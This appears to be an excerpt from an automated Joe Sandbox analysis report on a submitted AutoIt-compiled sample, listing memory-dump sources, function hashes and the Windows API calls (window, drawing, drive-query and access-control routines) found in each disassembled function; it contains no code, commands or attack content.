                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: bd6a01079ac20f018c1ed97dc08f8b9f8c34732ff98459d1dcd73203ada8b228
                        • Instruction ID: 6153cdae0ca99b331ab0b138bbbd601b8f0785471e84a6672b7ad7a3a9e08ab6
                        • Opcode Fuzzy Hash: bd6a01079ac20f018c1ed97dc08f8b9f8c34732ff98459d1dcd73203ada8b228
                        • Instruction Fuzzy Hash: 9321A8326206158BDB28CF79C81277A73E9B754310F19862EE4A7C37D0DE35A904C780
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702116243.0000000000960000.00000040.00001000.00020000.00000000.sdmp, Offset: 00960000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_960000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                        • Instruction ID: 4d524a4f0174df9fa6ca9feafd4c5964896521688e80471f461883c5be62bc89
                        • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                        • Instruction Fuzzy Hash: 2A019278A04209EFCB44DF98C6909AEF7B5FB48310F208599E809A7701D730AF41DB80
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702116243.0000000000960000.00000040.00001000.00020000.00000000.sdmp, Offset: 00960000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_960000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                        • Instruction ID: 6525b816810f51879d9d7928b828784ca22cde49fe7d4aad3dcba0420d4a148b
                        • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                        • Instruction Fuzzy Hash: 66019278A00209EFCB44DF98C5909AEF7B5FF48310F608599E809A7701D731AE41DB80
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702116243.0000000000960000.00000040.00001000.00020000.00000000.sdmp, Offset: 00960000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_960000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                        • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                        • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                        • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                        APIs
                        • DeleteObject.GDI32(00000000), ref: 00A02B30
                        • DeleteObject.GDI32(00000000), ref: 00A02B43
                        • DestroyWindow.USER32 ref: 00A02B52
                        • GetDesktopWindow.USER32 ref: 00A02B6D
                        • GetWindowRect.USER32(00000000), ref: 00A02B74
                        • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00A02CA3
                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00A02CB1
                        • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A02CF8
                        • GetClientRect.USER32(00000000,?), ref: 00A02D04
                        • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00A02D40
                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A02D62
                        • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A02D75
                        • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A02D80
                        • GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A02D89
                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A02D98
                        • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A02DA1
                        • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A02DA8
                        • GlobalFree.KERNEL32(00000000), ref: 00A02DB3
                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A02DC5
                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,00A1FC38,00000000), ref: 00A02DDB
                        • GlobalFree.KERNEL32(00000000), ref: 00A02DEB
                        • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00A02E11
                        • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00A02E30
                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A02E52
                        • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A0303F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                        • String ID: $AutoIt v3$DISPLAY$static
                        • API String ID: 2211948467-2373415609
                        • Opcode ID: e74de03193ddc810eadf6924ba3652a72bac2b10d83ec6fb9245244efb2339af
                        • Instruction ID: 51dbfbcc6508dc7f5d3c5d95e3e81a0a6451272ceafaf17bf12cab2e66858476
                        • Opcode Fuzzy Hash: e74de03193ddc810eadf6924ba3652a72bac2b10d83ec6fb9245244efb2339af
                        • Instruction Fuzzy Hash: 1B028B71900209AFDB14DFA4DC89FAE7BB9FB49720F148158F915AB2A1CB70ED01CB60
                        APIs
                        • SetTextColor.GDI32(?,00000000), ref: 00A1712F
                        • GetSysColorBrush.USER32(0000000F), ref: 00A17160
                        • GetSysColor.USER32(0000000F), ref: 00A1716C
                        • SetBkColor.GDI32(?,000000FF), ref: 00A17186
                        • SelectObject.GDI32(?,?), ref: 00A17195
                        • InflateRect.USER32(?,000000FF,000000FF), ref: 00A171C0
                        • GetSysColor.USER32(00000010), ref: 00A171C8
                        • CreateSolidBrush.GDI32(00000000), ref: 00A171CF
                        • FrameRect.USER32(?,?,00000000), ref: 00A171DE
                        • DeleteObject.GDI32(00000000), ref: 00A171E5
                        • InflateRect.USER32(?,000000FE,000000FE), ref: 00A17230
                        • FillRect.USER32(?,?,?), ref: 00A17262
                        • GetWindowLongW.USER32(?,000000F0), ref: 00A17284
                          • Part of subcall function 00A173E8: GetSysColor.USER32(00000012), ref: 00A17421
                          • Part of subcall function 00A173E8: SetTextColor.GDI32(?,?), ref: 00A17425
                          • Part of subcall function 00A173E8: GetSysColorBrush.USER32(0000000F), ref: 00A1743B
                          • Part of subcall function 00A173E8: GetSysColor.USER32(0000000F), ref: 00A17446
                          • Part of subcall function 00A173E8: GetSysColor.USER32(00000011), ref: 00A17463
                          • Part of subcall function 00A173E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00A17471
                          • Part of subcall function 00A173E8: SelectObject.GDI32(?,00000000), ref: 00A17482
                          • Part of subcall function 00A173E8: SetBkColor.GDI32(?,00000000), ref: 00A1748B
                          • Part of subcall function 00A173E8: SelectObject.GDI32(?,?), ref: 00A17498
                          • Part of subcall function 00A173E8: InflateRect.USER32(?,000000FF,000000FF), ref: 00A174B7
                          • Part of subcall function 00A173E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00A174CE
                          • Part of subcall function 00A173E8: GetWindowLongW.USER32(00000000,000000F0), ref: 00A174DB
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                        • String ID:
                        • API String ID: 4124339563-0
                        • Opcode ID: b40246a021757c4871ab87a45a4f2230223ab8eb7bf073f358406e490d743211
                        • Instruction ID: 3e526358c7c758e4d17de72caf896cf69b56a2eab741ba1bac56109b4e70e91a
                        • Opcode Fuzzy Hash: b40246a021757c4871ab87a45a4f2230223ab8eb7bf073f358406e490d743211
                        • Instruction Fuzzy Hash: 60A17F72088301BFD701DFA4DC48A9E7BBAFB49330F105B19F962961A1D771E9468B51
                        APIs
                        • DestroyWindow.USER32(?,?), ref: 00998E14
                        • SendMessageW.USER32(?,00001308,?,00000000), ref: 009D6AC5
                        • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 009D6AFE
                        • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 009D6F43
                          • Part of subcall function 00998F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00998BE8,?,00000000,?,?,?,?,00998BBA,00000000,?), ref: 00998FC5
                        • SendMessageW.USER32(?,00001053), ref: 009D6F7F
                        • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 009D6F96
                        • ImageList_Destroy.COMCTL32(00000000,?), ref: 009D6FAC
                        • ImageList_Destroy.COMCTL32(00000000,?), ref: 009D6FB7
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                        • String ID: 0
                        • API String ID: 2760611726-4108050209
                        • Opcode ID: c9c5642d2573558c33c166c10a4f3f0a6f50c2f7ae3d84e94eab8b202327e918
                        • Instruction ID: a99e3c60529f6b6535fd02e1ed5296407f0a49c739937e5c85c41db059deb185
                        • Opcode Fuzzy Hash: c9c5642d2573558c33c166c10a4f3f0a6f50c2f7ae3d84e94eab8b202327e918
                        • Instruction Fuzzy Hash: F312BD30244211DFDB25DF68D854BBAB7E9FB49310F14846EF4998B261CB35EC92CB91
                        APIs
                        • DestroyWindow.USER32(00000000), ref: 00A0273E
                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00A0286A
                        • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00A028A9
                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00A028B9
                        • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00A02900
                        • GetClientRect.USER32(00000000,?), ref: 00A0290C
                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00A02955
                        • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00A02964
                        • GetStockObject.GDI32(00000011), ref: 00A02974
                        • SelectObject.GDI32(00000000,00000000), ref: 00A02978
                        • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00A02988
                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00A02991
                        • DeleteDC.GDI32(00000000), ref: 00A0299A
                        • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00A029C6
                        • SendMessageW.USER32(00000030,00000000,00000001), ref: 00A029DD
                        • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00A02A1D
                        • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00A02A31
                        • SendMessageW.USER32(00000404,00000001,00000000), ref: 00A02A42
                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00A02A77
                        • GetStockObject.GDI32(00000011), ref: 00A02A82
                        • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00A02A8D
                        • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00A02A97
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                        • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                        • API String ID: 2910397461-517079104
                        • Opcode ID: 895242c2b9885ec98663178fc4c42c8acce3e3c69ff369d2a56579a48ea6219e
                        • Instruction ID: 8475ba6bc890c3d0e2f8b696d1ba927ca2fec67f95b48c2b6aa8f0cd5005c9f7
                        • Opcode Fuzzy Hash: 895242c2b9885ec98663178fc4c42c8acce3e3c69ff369d2a56579a48ea6219e
                        • Instruction Fuzzy Hash: E2B15A71A40219AFEB14DFA8DC49FAE7BA9FB48721F008514F914EB2D0D770AD41CBA4
                        APIs
                        • SetErrorMode.KERNEL32(00000001), ref: 009F4AED
                        • GetDriveTypeW.KERNEL32(?,00A1CB68,?,\\.\,00A1CC08), ref: 009F4BCA
                        • SetErrorMode.KERNEL32(00000000,00A1CB68,?,\\.\,00A1CC08), ref: 009F4D36
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: ErrorMode$DriveType
                        • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                        • API String ID: 2907320926-4222207086
                        • Opcode ID: 04121d1343306255866a21e0c1d1bf5b6c78dc268aaca7d97f59dfd09e5dff66
                        • Instruction ID: 0202261d857d61894efe601e322b6714125f5cff5ac6a98b6b92bca922140fbb
                        • Opcode Fuzzy Hash: 04121d1343306255866a21e0c1d1bf5b6c78dc268aaca7d97f59dfd09e5dff66
                        • Instruction Fuzzy Hash: 4161F63460520DEBCB04EF24C981EFE77B4BB85710B249815F946AB292DB39ED41DB52
                        APIs
                        • GetSysColor.USER32(00000012), ref: 00A17421
                        • SetTextColor.GDI32(?,?), ref: 00A17425
                        • GetSysColorBrush.USER32(0000000F), ref: 00A1743B
                        • GetSysColor.USER32(0000000F), ref: 00A17446
                        • CreateSolidBrush.GDI32(?), ref: 00A1744B
                        • GetSysColor.USER32(00000011), ref: 00A17463
                        • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00A17471
                        • SelectObject.GDI32(?,00000000), ref: 00A17482
                        • SetBkColor.GDI32(?,00000000), ref: 00A1748B
                        • SelectObject.GDI32(?,?), ref: 00A17498
                        • InflateRect.USER32(?,000000FF,000000FF), ref: 00A174B7
                        • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00A174CE
                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00A174DB
                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00A1752A
                        • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00A17554
                        • InflateRect.USER32(?,000000FD,000000FD), ref: 00A17572
                        • DrawFocusRect.USER32(?,?), ref: 00A1757D
                        • GetSysColor.USER32(00000011), ref: 00A1758E
                        • SetTextColor.GDI32(?,00000000), ref: 00A17596
                        • DrawTextW.USER32(?,00A170F5,000000FF,?,00000000), ref: 00A175A8
                        • SelectObject.GDI32(?,?), ref: 00A175BF
                        • DeleteObject.GDI32(?), ref: 00A175CA
                        • SelectObject.GDI32(?,?), ref: 00A175D0
                        • DeleteObject.GDI32(?), ref: 00A175D5
                        • SetTextColor.GDI32(?,?), ref: 00A175DB
                        • SetBkColor.GDI32(?,?), ref: 00A175E5
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                        • String ID:
                        • API String ID: 1996641542-0
                        • Opcode ID: ab6957024b2a51b9882aeba17850723b6886bb9a74f881d1bd766f43e6a79650
                        • Instruction ID: afadafa78720fe52942a591abd9ac6e5cbebd819d7f6fa43c9d996b43fb188fb
                        • Opcode Fuzzy Hash: ab6957024b2a51b9882aeba17850723b6886bb9a74f881d1bd766f43e6a79650
                        • Instruction Fuzzy Hash: 15616C76940218BFDF01DFA4DC49AEEBFB9EB08330F109215F911AB2A1D7749981CB90
                        APIs
                        • GetCursorPos.USER32(?), ref: 00A11128
                        • GetDesktopWindow.USER32 ref: 00A1113D
                        • GetWindowRect.USER32(00000000), ref: 00A11144
                        • GetWindowLongW.USER32(?,000000F0), ref: 00A11199
                        • DestroyWindow.USER32(?), ref: 00A111B9
                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00A111ED
                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00A1120B
                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00A1121D
                        • SendMessageW.USER32(00000000,00000421,?,?), ref: 00A11232
                        • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00A11245
                        • IsWindowVisible.USER32(00000000), ref: 00A112A1
                        • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00A112BC
                        • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00A112D0
                        • GetWindowRect.USER32(00000000,?), ref: 00A112E8
                        • MonitorFromPoint.USER32(?,?,00000002), ref: 00A1130E
                        • GetMonitorInfoW.USER32(00000000,?), ref: 00A11328
                        • CopyRect.USER32(?,?), ref: 00A1133F
                        • SendMessageW.USER32(00000000,00000412,00000000), ref: 00A113AA
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                        • String ID: ($0$tooltips_class32
                        • API String ID: 698492251-4156429822
                        • Opcode ID: 32cf4b955392a341776d9c5930525657ffcfc6e7fa1943127fd7eec8c4dc9b0b
                        • Instruction ID: 1f6f4b78646a36d563a6bb60282cc1b22c1e849235714f0172847b09d009ed08
                        • Opcode Fuzzy Hash: 32cf4b955392a341776d9c5930525657ffcfc6e7fa1943127fd7eec8c4dc9b0b
                        • Instruction Fuzzy Hash: D1B18B71608341AFD700DF64C884BAAFBE4FF88750F00891CFA999B2A1D771E885CB91
                        APIs
                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00998968
                        • GetSystemMetrics.USER32(00000007), ref: 00998970
                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0099899B
                        • GetSystemMetrics.USER32(00000008), ref: 009989A3
                        • GetSystemMetrics.USER32(00000004), ref: 009989C8
                        • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 009989E5
                        • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 009989F5
                        • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00998A28
                        • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00998A3C
                        • GetClientRect.USER32(00000000,000000FF), ref: 00998A5A
                        • GetStockObject.GDI32(00000011), ref: 00998A76
                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 00998A81
                          • Part of subcall function 0099912D: GetCursorPos.USER32(?), ref: 00999141
                          • Part of subcall function 0099912D: ScreenToClient.USER32(00000000,?), ref: 0099915E
                          • Part of subcall function 0099912D: GetAsyncKeyState.USER32(00000001), ref: 00999183
                          • Part of subcall function 0099912D: GetAsyncKeyState.USER32(00000002), ref: 0099919D
                        • SetTimer.USER32(00000000,00000000,00000028,009990FC), ref: 00998AA8
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                        • String ID: AutoIt v3 GUI
                        • API String ID: 1458621304-248962490
                        • Opcode ID: 31b33d90ac4662edf5676ddd10dc1ef23f6a638d1f037ab0b0825f9359d7bac9
                        • Instruction ID: 8ddc0b86529373805b0803e6d4481dc5c07d493f2a30bc26a7ca517dde6766dd
                        • Opcode Fuzzy Hash: 31b33d90ac4662edf5676ddd10dc1ef23f6a638d1f037ab0b0825f9359d7bac9
                        • Instruction Fuzzy Hash: 0CB15C71A80209DFDF14DFA8CC45BEE7BB5FB48325F10852AFA15AB290DB74A841CB50
                        APIs
                          • Part of subcall function 009E10F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 009E1114
                          • Part of subcall function 009E10F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,009E0B9B,?,?,?), ref: 009E1120
                          • Part of subcall function 009E10F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,009E0B9B,?,?,?), ref: 009E112F
                          • Part of subcall function 009E10F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,009E0B9B,?,?,?), ref: 009E1136
                          • Part of subcall function 009E10F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 009E114D
                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 009E0DF5
                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 009E0E29
                        • GetLengthSid.ADVAPI32(?), ref: 009E0E40
                        • GetAce.ADVAPI32(?,00000000,?), ref: 009E0E7A
                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 009E0E96
                        • GetLengthSid.ADVAPI32(?), ref: 009E0EAD
                        • GetProcessHeap.KERNEL32(00000008,00000008), ref: 009E0EB5
                        • HeapAlloc.KERNEL32(00000000), ref: 009E0EBC
                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 009E0EDD
                        • CopySid.ADVAPI32(00000000), ref: 009E0EE4
                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 009E0F13
                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 009E0F35
                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 009E0F47
                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009E0F6E
                        • HeapFree.KERNEL32(00000000), ref: 009E0F75
                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009E0F7E
                        • HeapFree.KERNEL32(00000000), ref: 009E0F85
                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009E0F8E
                        • HeapFree.KERNEL32(00000000), ref: 009E0F95
                        • GetProcessHeap.KERNEL32(00000000,?), ref: 009E0FA1
                        • HeapFree.KERNEL32(00000000), ref: 009E0FA8
                          • Part of subcall function 009E1193: GetProcessHeap.KERNEL32(00000008,009E0BB1,?,00000000,?,009E0BB1,?), ref: 009E11A1
                          • Part of subcall function 009E1193: HeapAlloc.KERNEL32(00000000,?,00000000,?,009E0BB1,?), ref: 009E11A8
                          • Part of subcall function 009E1193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,009E0BB1,?), ref: 009E11B7
                        Memory Dump Source
